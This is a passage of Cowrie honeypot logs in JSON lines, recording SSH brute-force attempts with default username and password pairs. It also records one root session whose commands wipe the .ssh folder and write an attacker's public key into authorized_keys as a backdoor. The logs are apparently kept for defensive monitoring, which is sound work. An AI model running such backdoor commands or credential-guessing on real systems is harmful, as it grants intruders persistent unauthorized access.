-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T04:07:40.165231Z","src_ip":"93.123.109.181","session":"d6a4b79b2d19"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana","message":"login attempt [solana/solana] failed","sensor":"my-vps","timestamp":"2025-08-26T04:07:40.225135Z","src_ip":"93.123.109.181","session":"d6a4b79b2d19"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:41.246388Z","src_ip":"93.123.109.181","session":"d6a4b79b2d19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39798,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3d8b49be2de","protocol":"ssh","message":"New connection: 212.227.235.229:39798 (1.2.3.4:22) [session: c3d8b49be2de]","sensor":"my-vps","timestamp":"2025-08-26T04:07:47.915686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:07:47.920285Z","src_ip":"212.227.235.229","session":"c3d8b49be2de"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:07:48.174536Z","src_ip":"212.227.235.229","session":"c3d8b49be2de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35370,"dst_ip":"1.2.3.4","dst_port":22,"session":"39e58c8012c6","protocol":"ssh","message":"New connection: 212.227.235.229:35370 (1.2.3.4:22) [session: 39e58c8012c6]","sensor":"my-vps","timestamp":"2025-08-26T04:07:48.656003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:07:48.657106Z","src_ip":"212.227.235.229","session":"39e58c8012c6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:07:48.909708Z","src_ip":"212.227.235.229","session":"39e58c8012c6"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-26T04:07:50.317296Z","src_ip":"212.227.235.229","session":"39e58c8012c6"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:52.189016Z","src_ip":"212.227.235.229","session":"39e58c8012c6"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-26T04:07:52.454838Z","src_ip":"212.227.235.229","session":"c3d8b49be2de"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:54.347946Z","src_ip":"212.227.235.229","session":"c3d8b49be2de"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":49010,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0218faaece6","protocol":"ssh","message":"New connection: 103.217.145.104:49010 (1.2.3.4:22) [session: a0218faaece6]","sensor":"my-vps","timestamp":"2025-08-26T04:07:55.567600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:07:55.568602Z","src_ip":"103.217.145.104","session":"a0218faaece6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:07:55.842363Z","src_ip":"103.217.145.104","session":"a0218faaece6"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd@12345","message":"login attempt [root/P@ssw0rd@12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:07:56.902207Z","src_ip":"103.217.145.104","session":"a0218faaece6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:07:57.480270Z","src_ip":"103.217.145.104","session":"a0218faaece6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:07:57.480976Z","src_ip":"103.217.145.104","session":"a0218faaece6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:07:57.481884Z","src_ip":"103.217.145.104","session":"a0218faaece6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:57.940728Z","src_ip":"103.217.145.104","session":"a0218faaece6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52242,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1fa53b594ea","protocol":"ssh","message":"New connection: 212.227.235.229:52242 (1.2.3.4:22) [session: b1fa53b594ea]","sensor":"my-vps","timestamp":"2025-08-26T04:07:58.135536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:07:58.177376Z","src_ip":"212.227.235.229","session":"b1fa53b594ea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:07:58.525227Z","src_ip":"103.217.145.104","session":"a0218faaece6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:07:58.526093Z","src_ip":"103.217.145.104","session":"a0218faaece6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:07:58.528416Z","src_ip":"212.227.235.229","session":"b1fa53b594ea"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:07:58.793953Z","src_ip":"103.217.145.104","session":"a0218faaece6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:58.794884Z","src_ip":"103.217.145.104","session":"a0218faaece6"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":49024,"dst_ip":"1.2.3.4","dst_port":22,"session":"82dca5a300a8","protocol":"ssh","message":"New connection: 103.217.145.104:49024 (1.2.3.4:22) [session: 82dca5a300a8]","sensor":"my-vps","timestamp":"2025-08-26T04:07:59.064425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:07:59.065051Z","src_ip":"103.217.145.104","session":"82dca5a300a8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:07:59.337613Z","src_ip":"103.217.145.104","session":"82dca5a300a8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:08:00.466954Z","src_ip":"103.217.145.104","session":"82dca5a300a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58796,"dst_ip":"1.2.3.4","dst_port":22,"session":"3752f83531ae","protocol":"ssh","message":"New connection: 212.227.235.229:58796 (1.2.3.4:22) [session: 3752f83531ae]","sensor":"my-vps","timestamp":"2025-08-26T04:08:01.333105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:01.408178Z","src_ip":"212.227.235.229","session":"3752f83531ae"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:01.581282Z","src_ip":"212.227.235.229","session":"3752f83531ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58908,"dst_ip":"1.2.3.4","dst_port":22,"session":"33ef23459758","protocol":"ssh","message":"New connection: 212.227.235.229:58908 (1.2.3.4:22) [session: 33ef23459758]","sensor":"my-vps","timestamp":"2025-08-26T04:08:01.736666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:08:01.737483Z","src_ip":"212.227.235.229","session":"33ef23459758"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:01.745459Z","src_ip":"103.217.145.104","session":"82dca5a300a8"}
